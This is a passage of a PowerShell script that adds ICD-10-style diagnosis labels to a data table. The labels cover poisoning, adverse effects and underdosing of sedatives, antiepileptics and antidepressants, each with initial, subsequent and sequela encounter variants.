undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by barbiturates, undetermined","Poisoning by barbiturates, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by barbiturates, undetermined","Poisoning by barbiturates, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of barbiturates","Adverse effect of barbiturates, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of barbiturates","Adverse effect of barbiturates, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of barbiturates","Adverse effect of barbiturates, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of barbiturates","Underdosing of barbiturates, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of barbiturates","Underdosing of barbiturates, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of barbiturates","Underdosing of barbiturates, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by benzodiazepines, accidental (unintentional)","Poisoning by benzodiazepines, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by benzodiazepines, accidental (unintentional)","Poisoning by benzodiazepines, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by benzodiazepines, accidental (unintentional)","Poisoning by benzodiazepines, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by benzodiazepines, intentional self-harm","Poisoning by benzodiazepines, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by benzodiazepines, intentional self-harm","Poisoning by benzodiazepines, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by benzodiazepines, intentional self-harm","Poisoning by benzodiazepines, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by benzodiazepines, assault","Poisoning by benzodiazepines, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by benzodiazepines, assault","Poisoning by benzodiazepines, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by benzodiazepines, assault","Poisoning by benzodiazepines, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by benzodiazepines, undetermined","Poisoning by benzodiazepines, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by benzodiazepines, undetermined","Poisoning by benzodiazepines, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by benzodiazepines, undetermined","Poisoning by benzodiazepines, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of benzodiazepines","Adverse effect of benzodiazepines, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of benzodiazepines","Adverse effect of benzodiazepines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of benzodiazepines","Adverse effect of benzodiazepines, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of benzodiazepines","Underdosing of benzodiazepines, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of benzodiazepines","Underdosing of benzodiazepines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of benzodiazepines","Underdosing of benzodiazepines, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed antiepileptics, accidental (unintentional)","Poisoning by mixed antiepileptics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed antiepileptics, accidental (unintentional)","Poisoning by mixed antiepileptics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed antiepileptics, accidental (unintentional)","Poisoning by mixed antiepileptics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed antiepileptics, intentional self-harm","Poisoning by mixed antiepileptics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed antiepileptics, intentional self-harm","Poisoning by mixed antiepileptics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed antiepileptics, intentional self-harm","Poisoning by mixed antiepileptics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed antiepileptics, assault","Poisoning by mixed antiepileptics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed antiepileptics, assault","Poisoning by mixed antiepileptics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed antiepileptics, assault","Poisoning by mixed antiepileptics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed antiepileptics, undetermined","Poisoning by mixed antiepileptics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed antiepileptics, undetermined","Poisoning by mixed antiepileptics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed antiepileptics, undetermined","Poisoning by mixed antiepileptics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of mixed antiepileptics","Adverse effect of mixed antiepileptics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of mixed antiepileptics","Adverse effect of mixed antiepileptics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of mixed antiepileptics","Adverse effect of mixed antiepileptics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of mixed antiepileptics","Underdosing of mixed antiepileptics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of mixed antiepileptics","Underdosing of mixed antiepileptics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of mixed antiepileptics","Underdosing of mixed antiepileptics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiepileptic and sedative-hypnotic drugs, accidental (unintentional)","Poisoning by other antiepileptic and sedative-hypnotic drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiepileptic and sedative-hypnotic drugs, accidental (unintentional)","Poisoning by other antiepileptic and sedative-hypnotic drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiepileptic and sedative-hypnotic drugs, accidental (unintentional)","Poisoning by other antiepileptic and sedative-hypnotic drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiepileptic and sedative-hypnotic drugs, intentional self-harm","Poisoning by other antiepileptic and sedative-hypnotic drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiepileptic and sedative-hypnotic drugs, intentional self-harm","Poisoning by other antiepileptic and sedative-hypnotic drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiepileptic and sedative-hypnotic drugs, intentional self-harm","Poisoning by other antiepileptic and sedative-hypnotic drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiepileptic and sedative-hypnotic drugs, assault","Poisoning by other antiepileptic and sedative-hypnotic drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiepileptic and sedative-hypnotic drugs, assault","Poisoning by other antiepileptic and sedative-hypnotic drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiepileptic and sedative-hypnotic drugs, assault","Poisoning by other antiepileptic and sedative-hypnotic drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiepileptic and sedative-hypnotic drugs, undetermined","Poisoning by other antiepileptic and sedative-hypnotic drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiepileptic and sedative-hypnotic drugs, undetermined","Poisoning by other antiepileptic and sedative-hypnotic drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiepileptic and sedative-hypnotic drugs, undetermined","Poisoning by other antiepileptic and sedative-hypnotic drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antiepileptic and sedative-hypnotic drugs","Adverse effect of other antiepileptic and sedative-hypnotic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antiepileptic and sedative-hypnotic drugs","Adverse effect of other antiepileptic and sedative-hypnotic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antiepileptic and sedative-hypnotic drugs","Adverse effect of other antiepileptic and sedative-hypnotic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other antiepileptic and sedative-hypnotic drugs","Underdosing of other antiepileptic and sedative-hypnotic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other antiepileptic and sedative-hypnotic drugs","Underdosing of other antiepileptic and sedative-hypnotic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other antiepileptic and sedative-hypnotic drugs","Underdosing of other antiepileptic and sedative-hypnotic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, accidental (unintentional)","Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, accidental (unintentional)","Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, accidental (unintentional)","Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, intentional self-harm","Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, intentional self-harm","Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, intentional self-harm","Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, assault","Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, assault","Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, assault","Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, undetermined","Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, undetermined","Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, undetermined","Poisoning by unspecified antiepileptic and sedative-hypnotic drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified antiepileptic and sedative-hypnotic drugs","Adverse effect of unspecified antiepileptic and sedative-hypnotic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified antiepileptic and sedative-hypnotic drugs","Adverse effect of unspecified antiepileptic and sedative-hypnotic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified antiepileptic and sedative-hypnotic drugs","Adverse effect of unspecified antiepileptic and sedative-hypnotic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified antiepileptic and sedative-hypnotic drugs","Underdosing of unspecified antiepileptic and sedative-hypnotic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified antiepileptic and sedative-hypnotic drugs","Underdosing of unspecified antiepileptic and sedative-hypnotic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified antiepileptic and sedative-hypnotic drugs","Underdosing of unspecified antiepileptic and sedative-hypnotic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, accidental (unintentional)","Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, accidental (unintentional)","Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, accidental (unintentional)","Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, intentional self-harm","Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, intentional self-harm","Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, intentional self-harm","Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, assault","Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, assault","Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, assault","Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, undetermined","Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, undetermined","Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, undetermined","Poisoning by antiparkinsonism drugs and other central muscle-tone depressants, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antiparkinsonism drugs and other central muscle-tone depressants","Adverse effect of antiparkinsonism drugs and other central muscle-tone depressants, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antiparkinsonism drugs and other central muscle-tone depressants","Adverse effect of antiparkinsonism drugs and other central muscle-tone depressants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antiparkinsonism drugs and other central muscle-tone depressants","Adverse effect of antiparkinsonism drugs and other central muscle-tone depressants, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antiparkinsonism drugs and other central muscle-tone depressants","Underdosing of antiparkinsonism drugs and other central muscle-tone depressants, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antiparkinsonism drugs and other central muscle-tone depressants","Underdosing of antiparkinsonism drugs and other central muscle-tone depressants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antiparkinsonism drugs and other central muscle-tone depressants","Underdosing of antiparkinsonism drugs and other central muscle-tone depressants, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by tricyclic antidepressants, accidental (unintentional)","Poisoning by tricyclic antidepressants, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tricyclic antidepressants, accidental (unintentional)","Poisoning by tricyclic antidepressants, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tricyclic antidepressants, accidental (unintentional)","Poisoning by tricyclic antidepressants, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by tricyclic antidepressants, intentional self-harm","Poisoning by tricyclic antidepressants, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tricyclic antidepressants, intentional self-harm","Poisoning by tricyclic antidepressants, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tricyclic antidepressants, intentional self-harm","Poisoning by tricyclic antidepressants, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by tricyclic antidepressants, assault","Poisoning by tricyclic antidepressants, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tricyclic antidepressants, assault","Poisoning by tricyclic antidepressants, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tricyclic antidepressants, assault","Poisoning by tricyclic antidepressants, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by tricyclic antidepressants, undetermined","Poisoning by tricyclic antidepressants, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tricyclic antidepressants, undetermined","Poisoning by tricyclic antidepressants, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tricyclic antidepressants, undetermined","Poisoning by tricyclic antidepressants, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of tricyclic antidepressants","Adverse effect of tricyclic antidepressants, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of tricyclic antidepressants","Adverse effect of tricyclic antidepressants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of tricyclic antidepressants","Adverse effect of tricyclic antidepressants, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of tricyclic antidepressants","Underdosing of tricyclic antidepressants, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of tricyclic antidepressants","Underdosing of tricyclic antidepressants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of tricyclic antidepressants","Underdosing of tricyclic antidepressants, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclic antidepressants, accidental (unintentional)","Poisoning by tetracyclic antidepressants, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclic antidepressants, accidental (unintentional)","Poisoning by tetracyclic antidepressants, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclic antidepressants, accidental (unintentional)","Poisoning by tetracyclic antidepressants, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclic antidepressants, intentional self-harm","Poisoning by tetracyclic antidepressants, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclic antidepressants, intentional self-harm","Poisoning by tetracyclic antidepressants, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclic antidepressants, intentional self-harm","Poisoning by tetracyclic antidepressants, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclic antidepressants, assault","Poisoning by tetracyclic antidepressants, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclic antidepressants, assault","Poisoning by tetracyclic antidepressants, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclic antidepressants, assault","Poisoning by tetracyclic antidepressants, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclic antidepressants, undetermined","Poisoning by tetracyclic antidepressants, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclic antidepressants, undetermined","Poisoning by tetracyclic antidepressants, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclic antidepressants, undetermined","Poisoning by tetracyclic antidepressants, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of tetracyclic antidepressants","Adverse effect of tetracyclic antidepressants, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of tetracyclic antidepressants","Adverse effect of tetracyclic antidepressants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of tetracyclic antidepressants","Adverse effect of tetracyclic antidepressants, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of tetracyclic antidepressants","Underdosing of tetracyclic antidepressants, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of tetracyclic antidepressants","Underdosing of tetracyclic antidepressants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of tetracyclic antidepressants","Underdosing of tetracyclic antidepressants, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by monoamine-oxidase-inhibitor antidepressants, accidental (unintentional)","Poisoning by monoamine-oxidase-inhibitor antidepressants, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by monoamine-oxidase-inhibitor antidepressants, accidental (unintentional)","Poisoning by monoamine-oxidase-inhibitor antidepressants, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by monoamine-oxidase-inhibitor antidepressants, accidental (unintentional)","Poisoning by monoamine-oxidase-inhibitor antidepressants, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by monoamine-oxidase-inhibitor antidepressants, intentional self-harm","Poisoning by monoamine-oxidase-inhibitor antidepressants, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by monoamine-oxidase-inhibitor antidepressants, intentional self-harm","Poisoning by monoamine-oxidase-inhibitor antidepressants, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by monoamine-oxidase-inhibitor antidepressants, intentional self-harm","Poisoning by monoamine-oxidase-inhibitor antidepressants, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by monoamine-oxidase-inhibitor antidepressants, assault","Poisoning by monoamine-oxidase-inhibitor antidepressants, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by monoamine-oxidase-inhibitor antidepressants, assault","Poisoning by monoamine-oxidase-inhibitor antidepressants, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by monoamine-oxidase-inhibitor antidepressants, assault","Poisoning by monoamine-oxidase-inhibitor antidepressants, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by monoamine-oxidase-inhibitor antidepressants, undetermined","Poisoning by monoamine-oxidase-inhibitor antidepressants, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by monoamine-oxidase-inhibitor antidepressants, undetermined","Poisoning by monoamine-oxidase-inhibitor antidepressants, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by monoamine-oxidase-inhibitor antidepressants, undetermined","Poisoning by monoamine-oxidase-inhibitor antidepressants, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of monoamine-oxidase-inhibitor antidepressants","Adverse effect of monoamine-oxidase-inhibitor antidepressants, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of monoamine-oxidase-inhibitor antidepressants","Adverse effect of monoamine-oxidase-inhibitor antidepressants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of monoamine-oxidase-inhibitor antidepressants","Adverse effect of monoamine-oxidase-inhibitor antidepressants, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of monoamine-oxidase-inhibitor antidepressants","Underdosing of monoamine-oxidase-inhibitor antidepressants, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of monoamine-oxidase-inhibitor antidepressants","Underdosing of monoamine-oxidase-inhibitor antidepressants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of monoamine-oxidase-inhibitor antidepressants","Underdosing of monoamine-oxidase-inhibitor antidepressants, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antidepressants, accidental (unintentional)","Poisoning by unspecified antidepressants, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antidepressants, accidental (unintentional)","Poisoning by unspecified antidepressants, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antidepressants, accidental (unintentional)","Poisoning by unspecified antidepressants, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antidepressants, intentional self-harm","Poisoning by unspecified antidepressants, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antidepressants, intentional self-harm","Poisoning by unspecified antidepressants, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antidepressants, intentional self-harm","Poisoning by unspecified antidepressants, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antidepressants, assault","Poisoning by unspecified antidepressants, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antidepressants, assault","Poisoning by unspecified antidepressants, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antidepressants, assault","Poisoning by unspecified antidepressants, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antidepressants, undetermined","Poisoning by unspecified antidepressants, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antidepressants, undetermined","Poisoning by unspecified antidepressants, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antidepressants, undetermined","Poisoning by unspecified antidepressants, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified antidepressants","Adverse effect of unspecified antidepressants, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified antidepressants","Adverse effect of unspecified antidepressants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified antidepressants","Adverse effect of unspecified antidepressants, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified antidepressants","Underdosing of unspecified antidepressants, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified antidepressants","Underdosing of unspecified antidepressants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified antidepressants","Underdosing of unspecified antidepressants, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin and norepinephrine reuptake inhibitors, accidental (unintentional)","Poisoning by selective serotonin and norepinephrine reuptake inhibitors, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin and norepinephrine reuptake inhibitors, accidental (unintentional)","Poisoning by selective serotonin and norepinephrine reuptake inhibitors, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin and norepinephrine reuptake inhibitors, accidental (unintentional)","Poisoning by selective serotonin and norepinephrine reuptake inhibitors, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin and norepinephrine reuptake inhibitors, intentional self-harm","Poisoning by selective serotonin and norepinephrine reuptake inhibitors, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin and norepinephrine reuptake inhibitors, intentional self-harm","Poisoning by selective serotonin and norepinephrine reuptake inhibitors, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin and norepinephrine reuptake inhibitors, intentional self-harm","Poisoning by selective serotonin and norepinephrine reuptake inhibitors, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin and norepinephrine reuptake inhibitors, assault","Poisoning by selective serotonin and norepinephrine reuptake inhibitors, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin and norepinephrine reuptake inhibitors, assault","Poisoning by selective serotonin and norepinephrine reuptake inhibitors, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin and norepinephrine reuptake inhibitors, assault","Poisoning by selective serotonin and norepinephrine reuptake inhibitors, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin and norepinephrine reuptake inhibitors, undetermined","Poisoning by selective serotonin and norepinephrine reuptake inhibitors, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin and norepinephrine reuptake inhibitors, undetermined","Poisoning by selective serotonin and norepinephrine reuptake inhibitors, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin and norepinephrine reuptake inhibitors, undetermined","Poisoning by selective serotonin and norepinephrine reuptake inhibitors, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of selective serotonin and norepinephrine reuptake inhibitors","Adverse effect of selective serotonin and norepinephrine reuptake inhibitors, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of selective serotonin and norepinephrine reuptake inhibitors","Adverse effect of selective serotonin and norepinephrine reuptake inhibitors, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of selective serotonin and norepinephrine reuptake inhibitors","Adverse effect of selective serotonin and norepinephrine reuptake inhibitors, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of selective serotonin and norepinephrine reuptake inhibitors","Underdosing of selective serotonin and norepinephrine reuptake inhibitors, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of selective serotonin and norepinephrine reuptake inhibitors","Underdosing of selective serotonin and norepinephrine reuptake inhibitors, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of selective serotonin and norepinephrine reuptake inhibitors","Underdosing of selective serotonin and norepinephrine reuptake inhibitors, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin reuptake inhibitors, accidental (unintentional)","Poisoning by selective serotonin reuptake inhibitors, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin reuptake inhibitors, accidental (unintentional)","Poisoning by selective serotonin reuptake inhibitors, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin reuptake inhibitors, accidental 